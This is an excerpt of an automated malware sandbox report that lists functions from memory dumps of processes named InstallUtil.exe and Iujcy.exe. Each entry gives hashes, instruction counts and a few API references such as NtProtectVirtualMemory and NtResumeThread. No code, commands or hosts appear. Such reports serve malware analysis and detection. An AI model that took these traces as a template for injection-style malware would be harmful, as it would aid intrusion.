Instruction ID: 50ea54054ae3275ae01dfb20c8701bac0187e8e87bc8400b34d65d9c984fe3bc
Opcode Fuzzy Hash: 5136707730637cc02c3a1e7ac2a85bbbfff8f4ddc117a36ed905edb559940c16
Instruction Fuzzy Hash: 92511D785063968FC71AFB28FCA5B463F75B7A120A7145D69D000DB27EDA306E4ECB81

Function 01131138 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ae69ba502892054283d82969960da3df10c187b2a864941203787e4579bb051
Instruction ID: 4c90fa715dbf2cf78d9550e093eb6b06ee56543d1d2e7622afde0307dd26ff08
Opcode Fuzzy Hash: 5ae69ba502892054283d82969960da3df10c187b2a864941203787e4579bb051
Instruction Fuzzy Hash: 45411D785063968FC71AFB29FCA5B463BA5B7A130A7045D69D000DB27DDA303F4ACB81

Function 01135060 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1abe1617ff7b438d05ccfcaeb3053e940d459c01911d13462efa07985c3d9e18
Instruction ID: 0eb39708aa2f7b3deb36933ba5ef9bdc27bcd28c702eb3c2e51a7d53069b7976
Opcode Fuzzy Hash: 1abe1617ff7b438d05ccfcaeb3053e940d459c01911d13462efa07985c3d9e18
Instruction Fuzzy Hash: 13319C30600250CFDF59EB38C5646AEBBF6AF89604F100468D806EB398DB36DD05CB91

Function 0113F360 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63fe486729ad6fee8f479356348275d00efc17bd4372ee27fcfb51f93f806ce1
Instruction ID: 380598a8b5d42e8669849b41a534c5061d50c5e0475acdcf0dffdda72323720d
Opcode Fuzzy Hash: 63fe486729ad6fee8f479356348275d00efc17bd4372ee27fcfb51f93f806ce1
Instruction Fuzzy Hash: E9317034E1060A9FDB19DF69C89469EBBB2FF88300F108519E815E7354DF70AD46CB51

Function 011326A5 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 313f59993df4831ab2543b7c0c1fe3e1bf478218907a8cb0a121a1dc2b54d593
Instruction ID: def70d24e08bb0ce53ef865cac9390bf295f2b0d71bcb537c083ffdfeaeac8f8
Opcode Fuzzy Hash: 313f59993df4831ab2543b7c0c1fe3e1bf478218907a8cb0a121a1dc2b54d593
Instruction Fuzzy Hash: 4B4102B0D007499FDB18DFA9C880ADEBFF1BF48310F248129E819AB254DB759946CF90

Function 011326B0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f07a29d722cf7a1aa6b0b6461e70f7ccc99e990ea608244caceb3888c220d6
Instruction ID: a9f91934291a15d04be9be98d7d68a9bc7d6eea3abffe0d5710a74f72ed29fcb
Opcode Fuzzy Hash: 24f07a29d722cf7a1aa6b0b6461e70f7ccc99e990ea608244caceb3888c220d6
Instruction Fuzzy Hash: D341D0B1D0074D9FDB18DFA9C984ADEBBF5BF48310F208029E819AB254DB75A945CF90

Function 01135070 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c354fe895a30664c39a7a3016d171f299f5dbcac21ebcbb0db84b0e344b01d5a
Instruction ID: 0363be65d96633d0b0103259d013a4b349dd8f0317e3fab38cbaf4fdad89b6f7
Opcode Fuzzy Hash: c354fe895a30664c39a7a3016d171f299f5dbcac21ebcbb0db84b0e344b01d5a
Instruction Fuzzy Hash: F9314D30B00214CFDB5DEB78C5547AEBBF6AB89644F100468D906EB398DB36DD41CB91

Function 01137059 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aef99a1d7bedd89e929e0d783a405dd6aa0827c2f85c05d2c316d1435ff426d
Instruction ID: 856e23b38a22c84141f93aee9fbfbae4fddc6aee4944edc414dba0adf378cda6
Opcode Fuzzy Hash: 7aef99a1d7bedd89e929e0d783a405dd6aa0827c2f85c05d2c316d1435ff426d
Instruction Fuzzy Hash: 38211C347003149FD709AB78D868B6E3BA7EBC8715B248468E4069B3A9CF35ED42DB50

Function 011392D1 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fabec8522a1c7a5fda1eb7d9c9bf654ed2cabd18be9bf8ccd09be2143423021d
Instruction ID: e20a232578d6c0d993b508ee0c12f8e4319b6815ae3c1ab2e58bccde1896fe47
Opcode Fuzzy Hash: fabec8522a1c7a5fda1eb7d9c9bf654ed2cabd18be9bf8ccd09be2143423021d
Instruction Fuzzy Hash: 2531A271E042199BDB09DFA8D4907DEBBB2BF89304F108519E801EB285EBB09D86CB50

Function 01131667 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77ae63b26f9bd0f0ed485691a0c1db038e6f9e172770a7ea3c07f82a274da333
Instruction ID: 4092a87de643f019c92a81339a6e434452b4618ef8ea10a57e481465c1b751ab
Opcode Fuzzy Hash: 77ae63b26f9bd0f0ed485691a0c1db038e6f9e172770a7ea3c07f82a274da333
Instruction Fuzzy Hash: BC21367CA012405FDB2BBB68EC8876A3B65EB81315F145965D006CB16EDF34ED0A8B82

Function 011392E0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ffabafa8c50091ebcc1f70362eb866c53e430c2d5056f4c05d70bed46ebbff
Instruction ID: 7b7341a4e7b6e7138fe8132b987fc356b46b93fcf863f3700f2f6a14b9f994b1
Opcode Fuzzy Hash: 19ffabafa8c50091ebcc1f70362eb866c53e430c2d5056f4c05d70bed46ebbff
Instruction Fuzzy Hash: 82217370E046099BDB19DF69D89069EBBB2FF89304F109519E805EB285DBB09D85CB50

Function 00D3D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1406804604.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_d3d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3235d97b5c4a00b50d213b7d3a25611adb5eac4594e3a52dee0f4d37d4107a
Instruction ID: 5615813cd9a0f4045c563e1ff102f18363878e872167c7434fe22fbfdee14ba1
Opcode Fuzzy Hash: bd3235d97b5c4a00b50d213b7d3a25611adb5eac4594e3a52dee0f4d37d4107a
Instruction Fuzzy Hash: CC21D371604204EFDB15DF14E9C0B26BB66FB94324F24C569E9490B256C336E856CBB2

Function 01131340 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b57833b9fb6168370400c95f03b87d6d89f7260e60b0e5072c68c0358b4c101
Instruction ID: b927d050484150a63f9ac07709184d59a3cd5e1dd73dacdbfe2b805a833c4145
Opcode Fuzzy Hash: 6b57833b9fb6168370400c95f03b87d6d89f7260e60b0e5072c68c0358b4c101
Instruction Fuzzy Hash: ED21D834A442509FEB3B672CDD8832D7751EB86326F100C69E406CB686DF29CC9EC756

Function 011391D1 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de652fc4ed46a01dd26a9267be28c1d6cbef02d3613c4f8beac41b4912b6547c
Instruction ID: cb6726cd2d5d0867b53535cc9d779887a8c678aa9c5231e91de28422a59babb2
Opcode Fuzzy Hash: de652fc4ed46a01dd26a9267be28c1d6cbef02d3613c4f8beac41b4912b6547c
Instruction Fuzzy Hash: 4421A435E00619DBDB0DCFA9C454A9EFBB1AFC9314F108A2AE815BB245DBB09C46CB40

Function 01134F50 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3666bd6f6bcbe542ff430e81a01fe24bfe3ec46142f7aa0f32dd38eca45cece1
Instruction ID: 8b1dff4a3c089069289c76f6d3b1b9ceac02f4555f31a1702e943338125d1ce2
Opcode Fuzzy Hash: 3666bd6f6bcbe542ff430e81a01fe24bfe3ec46142f7aa0f32dd38eca45cece1
Instruction Fuzzy Hash: CF212B347002158FDB58EB78D958B9EBBF1EF89240B1004A8E406EB365DB759D05CB51

Function 00E5D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1406996048.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e5d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a35def7ef19caa70c8e0afc2485d8b226945c936f3ca10e5ba8d0c97689c353c
Instruction ID: 59befe937624953c775b2e4ee566ce81072dcd6073dea407a2e8a66130759582
Opcode Fuzzy Hash: a35def7ef19caa70c8e0afc2485d8b226945c936f3ca10e5ba8d0c97689c353c
Instruction Fuzzy Hash: A221D075608300DFDB24DF14D9C4B16BB66EB84329F20C969DC4A5B296C33AD84BCA62

Function 01131452 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14629d0b102375805af088c1802086bd869a24497e713870ce9473935cfe7d85
Instruction ID: 884438472a1ae20bc6eda62f3aca3b4fab87952c304def6d7b2f42b92e13d5ef
Opcode Fuzzy Hash: 14629d0b102375805af088c1802086bd869a24497e713870ce9473935cfe7d85
Instruction Fuzzy Hash: C1216D31A002269BDF29AFBC95402EDBBF5EF88214F14047AD909DB606EB35C846CB91

Function 01131840 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b2001ebe15db509f190a3e7ff8296b4263f1c6639c379990fe2abfca7c94d9
Instruction ID: 5d702930ea8787607e54733fb957971400952d7710c6cbc681710a02807013bc
Opcode Fuzzy Hash: c9b2001ebe15db509f190a3e7ff8296b4263f1c6639c379990fe2abfca7c94d9
Instruction Fuzzy Hash: 67218E30B00255DFEF18EB78C5247AE7BF6AF89200F2004A8D106EB354EB319D41CB95

Function 011391E0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ee411217a70f968b525a05047806e145f3d1983dc97720273af06a1aca99b1f
Instruction ID: 3780d590b226c4a313778d126af11be72f5b0feabff53ffac4abf69b67095bb7
Opcode Fuzzy Hash: 1ee411217a70f968b525a05047806e145f3d1983dc97720273af06a1aca99b1f
Instruction Fuzzy Hash: C4215035E00A19DBDB1DCFA9D454A9EB7B2AFC9314F10862AE815BB384DBB09C45CB50

Function 01131850 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acc086b2927f32c25017179be33be4309b6ebc0019a51a28a37f93cc772adacf
Instruction ID: 586f857767ab3387039258eaf24142ee3d34f8150c5df2e98f017bc294620300
Opcode Fuzzy Hash: acc086b2927f32c25017179be33be4309b6ebc0019a51a28a37f93cc772adacf
Instruction Fuzzy Hash: 2C211D30B00215DFDF18EB79C5247AE77F6AB89245F2004B8D506EB398EB359D01CB95

Function 01131678 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd82d7e14ab11a6745323b7d0745737e439237fd0c43b026c917a3a1179a2d2
Instruction ID: e85af2e21959e2f42ca909efb0efb54357e9371c6afa40aeb728a0b9b109799a
Opcode Fuzzy Hash: 6bd82d7e14ab11a6745323b7d0745737e439237fd0c43b026c917a3a1179a2d2
Instruction Fuzzy Hash: 6721C37CA012006FDB27F768E888B1A375AEB84715F105921D006CB26EDF34ED4A8B91

Function 01134F60 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7719a2a8a7052b34b6c742ff0b84a926e632b726fa00543eacc74a185d879abb
Instruction ID: fc460948aa5683695e0c6791241f11d5200c6b440b966e992e4785199feeb8c4
Opcode Fuzzy Hash: 7719a2a8a7052b34b6c742ff0b84a926e632b726fa00543eacc74a185d879abb
Instruction Fuzzy Hash: 6E213C30700215CFDB58EB79D958B9E7BF6EF88640F100468E406EB365DB769D04CB91

Function 01130838 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a255e8c381fe0b59ecdb04463b2200af81a59d208d78ae10f64f3899e06651cc
Instruction ID: c3ca1ea87fa3bdffb60cdf369ba47260b621de390673b1a1c10660e72766e28d
Opcode Fuzzy Hash: a255e8c381fe0b59ecdb04463b2200af81a59d208d78ae10f64f3899e06651cc
Instruction Fuzzy Hash: ED11A734F013059BEF2EAA69D8503693795EBCA614F1049BAF006DF24AEB21CD4687D1

Function 01130848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ac49ded7b2a7c20faaf6fad2825e60e7b6975d7fa0850403681f738f9bc6ee
Instruction ID: 9396a27581b94fa1d639104a5acd70c1105d7dea3a2b1260f80d50da846da1ad
Opcode Fuzzy Hash: 48ac49ded7b2a7c20faaf6fad2825e60e7b6975d7fa0850403681f738f9bc6ee
Instruction Fuzzy Hash: F7115134F002098BEF2DAA7DD95476932D5EBC9615F1049BAF006CF35AEB21DC868BD1

Function 00E5D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1406996048.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e5d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4b262389a8867412e2a6cbca84e1030d3141a21c2997e74ada1d5efc634015e
Instruction ID: 2b57dfa038bf8d15aac20ce513c1f12cba493142a30ce327964a5de9e3dbec91
Opcode Fuzzy Hash: f4b262389a8867412e2a6cbca84e1030d3141a21c2997e74ada1d5efc634015e
Instruction Fuzzy Hash: 3621537550D3808FDB16CF24D994715BF72EB46314F28C5EAD8498B6A7C33A980ACB62

Function 00D3D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1406804604.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_d3d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: c907754b0bd93ef0dbf7b226321b756178095529ab35dc8557cd9dd82da19a6c
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: 2E11E676504240DFCB05DF10D5C4B16BF72FB94324F28C5A9D8490B656C33AE856CFA1

Function 01131460 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19413ec66a8d7a5903c68bd52028563432de82f0787102107006423aeca5ab89
Instruction ID: b67351aa09e7453855e5d3ff36f35c88d69890df471d06fba1d146042ecd9901
Opcode Fuzzy Hash: 19413ec66a8d7a5903c68bd52028563432de82f0787102107006423aeca5ab89
Instruction Fuzzy Hash: 08014C31F002269BCF29EFB985401AEBBF9FBC8254B25047AD809E7705E735C941CBA1

Function 01138170 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a99a29b4c7ee1b4073bed5143fb1a8934ad72bff93dca031e527eef63aa10fe0
Instruction ID: 2685682ba12a4bed97077d2f52a9c259387535b40e5c2e2aec1c2692f8502e75
Opcode Fuzzy Hash: a99a29b4c7ee1b4073bed5143fb1a8934ad72bff93dca031e527eef63aa10fe0
Instruction Fuzzy Hash: 1B018F38A053949FDB1AFBB8EA9079D7F71AF41201B5446E8C0449F1DADE306E0AC792

Function 01138180 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1409806490.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1130000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5b19fbb81cf1b78bda8c8671b60ac3860a85d6a76a5dfb28b94ae8ba6e30dd
Instruction ID: 58ad9a2a28a342b8fb31170fe6f5613458fd2011f38358e4456b6140d226ccc3
Opcode Fuzzy Hash: ff5b19fbb81cf1b78bda8c8671b60ac3860a85d6a76a5dfb28b94ae8ba6e30dd
Instruction Fuzzy Hash: A2F03138900258AFDB05FFA8E99179DBBB1EB40301F5095A8C404DB259EF307F09CB91

Analysis Process: Iujcy.exePID: 8044, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	54
Total number of Limit Nodes:	3

Executed Functions

Function 0619CF18 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0619CFCD

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: ba0bce364b4c03f8d5a78acd5b7322e7a01dba8effb6d2efe773eb1a1881a6f8
Instruction ID: 160d2c5311b93e9faec2285eec7165e128e57dc2e0c9ff1cc4c2c2d0aba389ce
Opcode Fuzzy Hash: ba0bce364b4c03f8d5a78acd5b7322e7a01dba8effb6d2efe773eb1a1881a6f8
Instruction Fuzzy Hash: 844179B5D042589FCF10CFAAD980ADEFBB1BB49310F14942AE815B7210D735A946CF68

Function 0619E400 Relevance: 1.6, APIs: 1, Instructions: 86nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0619E496

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c447e1238b736dfdc9d7527e1535df8747a474c578464160a74e5f664534cc29
Instruction ID: a524ee68900800c9eb2b0e696eadb9a1b48467e11d68d71bd84b5fdaf5348ad7
Opcode Fuzzy Hash: c447e1238b736dfdc9d7527e1535df8747a474c578464160a74e5f664534cc29
Instruction Fuzzy Hash: 543199B5D012189FDF10DFA9D980A9EFBF1BB49310F10952AE815B7340C739A906CFA4

Function 0619E408 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0619E496

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fef258d20024a68e81e545691917ae93c5571ef2f2ad9efc30fa5c8509e5f974
Instruction ID: 57568a07e2be15ed2f6c3a8b0e952ab15f96dc472c87fdcb1913a611cb8a754f
Opcode Fuzzy Hash: fef258d20024a68e81e545691917ae93c5571ef2f2ad9efc30fa5c8509e5f974
Instruction Fuzzy Hash: 553188B4D012189FDF14DFAAD980A9EFBF5BF49310F10942AE815B7240C775A946CFA4

Function 0634D808 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Dq, xrefs: 0634D90D

Memory Dump Source

Source File: 0000000A.00000002.1453525457.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6330000_Iujcy.jbxd

Similarity

API ID:
String ID: Dq
API String ID: 0-144822681
Opcode ID: a225ca14fc3989e6d5b3d2fd56ded4b73eb786c938072b3319df87d9494c95c7
Instruction ID: d44749977f98c404ab9cdac57a0ebd724ef8580ddf676e7b04644e43fefe5c44
Opcode Fuzzy Hash: a225ca14fc3989e6d5b3d2fd56ded4b73eb786c938072b3319df87d9494c95c7
Instruction Fuzzy Hash: 67D19D74E10258CFDB54DFA9D994A9DBBF2BF88300F1081A9E509AB365DB31AD81CF50

Function 061B7EE0 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 061B8259
4'q, xrefs: 061B80FA
4'q, xrefs: 061B81D9

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q
API String ID: 0-3126650252
Opcode ID: 3ca3d1d62389c2b7f362a12b69ed18696d9935ea20866e678fdf60ac926203f1
Instruction ID: 0d000307a7611955b9b1d9cb966da5c6cfdefffcd14dc7905b41e5e17cae67f9
Opcode Fuzzy Hash: 3ca3d1d62389c2b7f362a12b69ed18696d9935ea20866e678fdf60ac926203f1
Instruction Fuzzy Hash: 19F1DC34A10218DFDB48DFA4D994A9DBBB2FF88301F159558E806AB3A5DF71EC42CB50

Function 00F485E8 Relevance: 3.8, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Y, xrefs: 00F474F0
V, xrefs: 00F486AC
, xrefs: 00F4867C

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID: $V$Y
API String ID: 0-2749217412
Opcode ID: 6c30ace4d0e457649fa35f472bc91f1243863ba9d64ab6b7e2220915488110c2
Instruction ID: 752329c638eea25fb200fb3ad0a6fa05217ddc0480009304e8d8134d2ec4a8b2
Opcode Fuzzy Hash: 6c30ace4d0e457649fa35f472bc91f1243863ba9d64ab6b7e2220915488110c2
Instruction Fuzzy Hash: 6E31C278C012A9CFDBA0DF65C84879DBBF0BB19315F4084EAA889A6244DB745EC5DF90

Function 05EA0D08 Relevance: 3.1, Strings: 2, Instructions: 608COMMON

Download Yara Rule

Strings

4'q, xrefs: 05EA1559
4'q, xrefs: 05EA1549

Memory Dump Source

Source File: 0000000A.00000002.1451255836.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ea0000_Iujcy.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: ee2d88464f6b79ff13140440a68def082a5b31d6059dc236495b603f0eadf6ae
Instruction ID: 5df8d64d3f79045465d71a03ece97a7f2090442a43f54876c33ab211c42914f3
Opcode Fuzzy Hash: ee2d88464f6b79ff13140440a68def082a5b31d6059dc236495b603f0eadf6ae
Instruction Fuzzy Hash: 6942F675E04209CFEB19CFA5C489AEEBBB6FF48306F10A015E592AB350DB746942CF51

Function 061B2748 Relevance: 3.0, Strings: 2, Instructions: 516
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 061B2AB3
$q, xrefs: 061B2AC3

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
